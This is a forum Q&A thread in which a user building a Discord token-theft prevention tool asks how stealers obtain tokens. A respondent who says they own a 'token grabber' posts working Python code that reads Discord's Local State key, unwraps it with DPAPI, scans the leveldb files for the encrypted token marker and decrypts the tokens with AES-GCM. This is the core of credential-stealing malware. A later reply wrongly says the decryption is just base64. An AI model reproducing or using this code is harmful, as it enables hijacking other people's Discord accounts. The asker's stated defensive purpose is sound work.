I'm making a program to prevent discord token theft
I'm making a program to prevent discord token theft. And I have a question, how do all these viruses get the discord token from the discord application? What files do they download it from and how do they decrypt it? Because I'm writing a program to prevent this and I have to write such an algorithm. I'm doing this in c# .NET 4.7.2.
I tried searching on Google and GitHub but I didn't find anything.

I have a token grabber, and it accesses:
\AppData\Roaming\discord\Local Storage\leveldb

Hope this helps.
The code, which is in python, is:
def get_token():
    
    encPattern = r'dQw4w9WgXcQ:[^\"]*'
    dbPath = os.path.normpath(r"%s\AppData\Roaming\discord\Local Storage\leveldb"%(os.environ['USERPROFILE']))
    statePath = os.path.normpath(r"%s\AppData\Roaming\discord\Local State" % (os.environ['USERPROFILE']))
    with open(statePath, 'r') as f:
        state = f.read()
    state = json.loads(state)
    master_key = base64.b64decode(state["os_crypt"]["encrypted_key"])
    master_key = master_key[5:]
    master_key = CryptUnprotectData(master_key, None, None, None, 0)[1]
    for file_name in os.listdir(dbPath):
        if file_name[-3:] not in ["log", "ldb"]:
            continue
        for line in [x.strip() for x in open(f'{dbPath}\\{file_name}', errors='ignore').readlines() if x.strip()]:
            for y in re.findall(encPattern, line):
                enc_token = base64.b64decode(y.split('dQw4w9WgXcQ:')[1])
                iv = enc_token[3:15]
                payload = enc_token[15:]
                cipher = AES.new(master_key, AES.MODE_GCM, iv)
                decr_token = cipher.decrypt(payload)
                decr_token = decr_token[:-16].decode()
                if check_token(decr_token):
                    return decr_token
                


alr and how you downloading token? Can you provide code? Thx.

@FilipG The code accessed that file, which it then splits it by "dQw4w9WgXcQ:" and decrypts it using base64.
